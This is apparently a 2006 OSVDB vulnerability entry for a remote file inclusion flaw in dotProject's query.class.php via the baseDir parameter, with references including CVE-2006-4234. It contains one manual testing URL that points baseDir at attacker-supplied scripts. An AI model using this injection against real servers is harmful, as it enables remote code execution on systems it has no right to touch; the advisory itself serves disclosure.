dotProject classes/query.class.php baseDir Variable Remote File Inclusion

2006-08-16T22:57:45
ID OSVDB:29478
Type osvdb
Reporter OSVDB
Modified 2006-08-16T22:57:45

Description

Manual Testing Notes

http://t[arget]/[dotProject_path]/classes/query.class.php?baseDir=[evil_scripts]

References:

ISS X-Force ID: 28401 Generic Exploit URL: http://www.milw0rm.com/exploits/2191 FrSIRT Advisory: ADV-2006-3297 CVE-2006-4234 Bugtraq ID: 19547